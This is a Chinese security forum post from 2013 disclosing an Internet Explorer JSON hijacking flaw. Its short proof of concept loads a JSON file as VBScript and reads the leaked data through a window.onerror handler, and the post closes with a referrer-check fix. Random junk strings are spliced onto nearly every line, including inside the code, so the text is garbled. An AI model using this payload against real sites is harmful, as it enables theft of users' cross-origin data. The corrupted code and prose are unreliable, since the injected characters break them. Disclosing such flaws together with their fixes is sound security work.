找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2072|回复: 0
打印 上一主题 下一主题

IE通用JSON劫持漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-23 11:33:57 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
简要描述:: J' S8 E" f* x) J1 j6 Z: U3 w
/ a5 u) v4 m8 G; y1 \4 S- I; p
由于某些资源容器对数据处理不当导致json劫持漏洞.
5 t$ C4 J* s9 X# K4 p" W6 P! h  r详细说明:* ^2 `, U! P, c4 Q
由于ie支持vbscript,所以script元素可以指定成vbscript语言:
0 @- k, b* @1 S3 t<script language=vbscript></script>) h" [* s. K' S* P

: w4 ^5 l$ n) _; I7 a" s5 @当但我们指定的是一个js格式的文件是将会发现一个异常,这使我们通过捕获这个异常的信息来获得部分json数据.& j* q9 R; I& ?  e! j4 W/ V
漏洞证明:
1 J& e1 v) D" G8 q! C  k<script>4 ]! L2 H/ S& V9 D6 c
window.onerror=function(_){4 @2 a/ H: o9 i9 y" b
alert(_)8 ?7 X$ |+ M5 ~' r3 f; |  H
}! q4 f% }( t$ c" ~/ h
</script>- W+ G( t8 {0 w- \0 k
<script language=vbscript src=1.json></script>
2 x; D* j  F1 F: i1 R ( O5 \) s" K) Q7 v; O, Y7 b

1 Y3 f5 U' R5 G! q- n1 i) `1.json:- z! v+ v/ o4 h1 Y
[{"name":"sogili","age":19}]' c1 L- K, q" x. k  {- p  M
修复方案:) g0 q6 G2 I" H
网站业务对于这个问题可以通过验证referrer是否为同源来防御
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表